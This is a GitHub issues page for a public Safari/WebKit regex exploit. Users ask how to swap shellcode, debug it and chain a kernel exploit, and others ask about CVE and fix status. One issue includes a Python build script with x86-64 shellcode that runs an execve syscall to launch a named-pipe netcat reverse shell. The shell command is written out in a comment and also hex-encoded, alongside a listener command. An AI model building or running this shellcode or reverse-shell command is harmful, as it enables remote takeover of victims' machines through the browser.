webkit-regex-exploit's Issues
Thank you
Thank you
Questions about the shellcode
Hello, I have some questions about it.
When I change the shellcode (such as running a command using the execve syscall) in stage2 and run make.py, Safari does not work well.
So, how do I change the shellcode to run a command?
When I use lldb to attach to Safari and debug it, I write `int 3` in the shellcode, but lldb does not stop at the 0xcc. If I use lldb to attach to it, where should I set breakpoints to test the shellcode?
Looking forward to your reply. Thank you.
make.py
```python
#!/usr/bin/env python
import subprocess
from string import Template
str_to_print = "Hello world from Assembly!\n"
# Generate payload
template = """
.intel_syntax noprefix
.text
.macro putchar chr
lea rax, [rip+3f]
mov qword ptr [rip+reentry_function], rax
movabs rax, 0xFFFF000000000000+\chr
ret
3:
.endmacro
.globl start
start:
$buf
cmp qword ptr [rip+reentry_function], 0
je 3f
mov rax, qword ptr [rip+reentry_function]
jmp rax
3:
$payload
// Return value
movabs rax, 0xFFFF000000000000
ret
.data
.globl reentry_function
reentry_function:
.quad 0
"""
payload = ""
for c in str_to_print:
    payload += "putchar %d\n"%(ord(c))
buf = '''
xor rax, rax
mov rax,0x2
ror rax, 0x28
or rax, 59
mov rcx, rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rdx
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0x632d
push rdx
push rbx
push rsp
pop rbx
push rdx
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
; nc -lv 0.0.0.0 7777
mov rcx, 0x66
push rcx
mov rcx, 0x2f706d742f203e20
push rcx
mov rcx, 0x3737373720363032
push rcx
mov rcx, 0x2e34342e3031322e
push rcx
mov rcx, 0x303120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
push rsp
pop rcx
push rdx
push rcx
push rbx
push rdi
push rsp
pop rsi
syscall
'''
payload = Template(template).substitute(payload=payload, buf=buf)
# payload = Template(template).substitute(payload=payload)
# Write payload
f = open("stage2_macOS.S", "w+")
f.write(payload)
f.close()
# Build payload
subprocess.check_call(['clang', '-nostdlib', '-static', 'stage2_macOS.S', '-o', 'stage2_macOS.o'])
subprocess.check_call(['gobjcopy', '-O', 'binary', 'stage2_macOS.o', 'stage2_macOS.bin'])
# Delete the generated source and binary
subprocess.check_call(['rm', 'stage2_macOS.S'])
subprocess.check_call(['rm', 'stage2_macOS.o'])
```
iOS shellcode loading
I DMed you personally on Twitter but you have yet to answer, so I opened an issue here instead. How would I go about loading, for example, a kernel exploit binary via this exploit without writing a Mach-O loader?
Clarification on README.md
Hi,
I apologize if I am misreading/misunderstanding, but you state in your README.md:
This is an exploit for the latest version of Safari (as of Dec. 6 2018). Fixed in the current WebKit release, therefore I decided to make this public.
- What exactly do you mean by "it's fixed in the current release of WebKit"? Is the WebKit release not pushed out to iOS/macOS yet or something? I am not too familiar with the Apple environment, so I apologize. Does iOS update its WebKit version independently of iOS updates, or would there need to be a new version of iOS to fix this?
- Is the vulnerability only for Safari specifically, or for all WebKit-based browsers?
- What WebKit version fixes this?
- Is there a CVE for this?
Thank you and incredible job on this!